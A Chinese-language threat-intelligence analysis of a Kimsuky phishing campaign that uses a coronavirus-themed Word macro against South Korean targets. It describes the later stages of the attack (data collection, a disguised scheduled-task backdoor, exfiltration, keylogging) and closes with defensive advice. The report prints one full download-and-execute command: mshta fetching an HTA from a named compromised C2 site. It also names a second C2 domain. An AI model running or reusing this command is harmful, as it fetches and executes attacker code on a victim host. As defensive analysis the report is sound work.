一、概述

二、活动分析

Kimsuky组织向南韩受害者发送包含“코로나바이러스 대응.doc”（冠状病毒应对措施）附件的钓鱼邮件，文档内容如下：

部分翻译结果如下：

将文档中的宏代码提取，内容如下：

其中主要的十六进制数据内容为启动mshta执行下载操作，编码内容如下：

还原完整完整下载命令为：

"C:\Windows\System32\mshta.exe" http://vnext.mireene.com/theme/basic/skin/member/basic/upload/search.hta /f

其中挂载恶意代码的C2网站“vnext.mireene.com”为南韩购物网站，猜测已被Kimsuky入侵。

search.hta执行访问下载eweerew.php?er=1。

eweerew.php?er=1功能为修改主机office安全选项，收集主机名、用户名、IP信息、进程列表、磁盘信息、网络环境信息等结果并保存在“desktop.ini”，伪装成正常的配置文件。

收集信息后添加伪装为Acrobat更新的计划任务，用作后门定时请求C2命令。

eweerew.php?er=2将上一步收集的信息文件“desktop.ini”进行base64加密并保存为“res.ini”，下载res1.txt和res2.txt执行。

res1.txt将上一步生成的“res.ini”文件回传C2。

res2.txt主要执行键盘记录操作，通过对比按键ASCII码值记录信息。

本次攻击与之前的钓鱼文档“문정인 대통령 통일외교안보특보 미국 국익센터 세미나.doc”（文正仁总统统一外交安全研讨会）共用代码，文档内容为朝韩问题。

下图左为冠状病毒文档中的宏代码，右图为安全研讨会文档宏代码。使用混淆方式、加密方式、代码逻辑和执行功能相同。

上述两个宏代码下载的search.hta与pop.hta完全相同。

search.hta：

pop.hta：

安全研讨会钓鱼文档使用的C2：kiseong.co.kr 同样为入侵控制的南韩网站。

三、总结

Kimsuky组织在网络攻击中对南韩表现出极大的兴趣，曾使用“rnicrosoft”伪装“microsoft”、“corn”伪装“com”等手段实施钓鱼攻击。本次攻击仍然使用钓鱼邮件作为切入口，但并未使用任何PE文件，攻击过程中使用多阶段脚本实现目的并设置轻量化后门。具有降低检测率、开发成本低、兼容操作系统等特点，不过脚本混淆程度和手段不够高明且计划任务后门鲁棒性不强。

四、防护建议

1、疫情期间收到和疫情相关的邮件需要特别注意，切勿擅自打开，重要邮件需和发件人确认。

2、疫情面前，尤需秉持科学精神、理性态度，多关注权威媒体消息，不轻信其他途径的文章。